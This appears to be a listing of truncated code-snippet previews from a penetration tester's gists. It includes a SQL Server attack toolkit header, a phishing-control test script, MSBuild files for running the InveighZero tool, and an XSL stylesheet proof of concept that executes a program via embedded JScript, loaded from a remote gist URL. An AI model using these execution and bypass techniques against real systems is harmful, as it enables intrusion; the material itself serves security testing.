nullbind

#requires -version 2
<#
        File: PowerUpSQL.ps1
        Author: Scott Sutherland (@_nullbind), NetSPI - 2020
        Major Contributors: Antti Rantasaari and Eric Gruber
        Version: 1.106
        Description: PowerUpSQL is a PowerShell toolkit for attacking SQL Server.
        License: BSD 3-Clause
        Required Dependencies: PowerShell v.2
        Optional Dependencies: None

nullbind

# Author: Scott Sutherland, @_nullbind, NetSPI
Function Send-ProtocolHandlerEmailLinks
{
 <#
            .SYNOPSIS
            The script can be used to enumerate local protocol handlers and create sample emails
            contain links to the handlers.  It is intended to be used for testing email controls
            that help prevent phishing.
            .PARAMETER TargetEmail
            Email address to send generated emails to.

nullbind

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
 
<msxsl:script language="JScript" implements-prefix="user">
   function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
   return nodelist.nextNode().xml;

nullbind

<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>

nullbind

function New-InMemoryModule
{

    Param
    (
        [Parameter(Position = 0)]
        [ValidateNotNullOrEmpty()]
        [String]
        $ModuleName = [Guid]::NewGuid().ToString()
    )

nullbind

/*
		AppDomain Hijacking Execution Method
  
		File: Inveigh-AppDomain-Hijack.cs
		Author: Kevin Robertson 
		Description		
		This file can be used to execute InveighZero through MSBuild.
		Original Repository: https://github.com/Kevin-Robertson/InveighZero
		
		Note: The reflection technique used to load the inveighzero.exe from a string was based on

nullbind

# based on: https://msrc-blog.microsoft.com/2008/12/09/ms08-075-reducing-attack-surface-by-turning-off-protocol-handlers/
# https://blogs.msdn.microsoft.com/noahc/2006/10/19/register-a-custom-url-protocol-handler/
# https://zero.lol/2019-05-22-fun-with-uri-handlers/
# https://www.vdoo.com/blog/exploiting-custom-protocol-handlers-in-windows
# https://docs.microsoft.com/en-us/windows/win32/shell/app-registration
# https://docs.microsoft.com/en-us/windows/win32/shell/fa-intro
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
# jnlp:file://///server/file.txt

$null = $DataTable = New-Object System.Data.DataTable;

nullbind

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--
		File: Inveigh.xml
		Author: Kevin Robertson 
		Description		
		This file can be used to execute InveighZero through MSBuild.
		Original Repository: https://github.com/Kevin-Robertson/InveighZero
		
		Using msbuild.exe to execute .net code through inline tasks is a technique that
		was developed by Casey Smith. You can explicitly 

nullbind

# source: https://mcpmag.com/articles/2017/07/27/gathering-installed-software-using-powershell.aspx
Function Get-Software  {

  [OutputType('System.Software.Inventory')]

  [Cmdletbinding()] 

  Param( 

  [Parameter(ValueFromPipeline=$True,ValueFromPipelineByPropertyName=$True)] 

nullbind

function Get-LdapQuery
{    
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory = $false,
        HelpMessage = 'Domain user to authenticate with domain\user.')]
        [string]$Username,

        [Parameter(Mandatory = $false,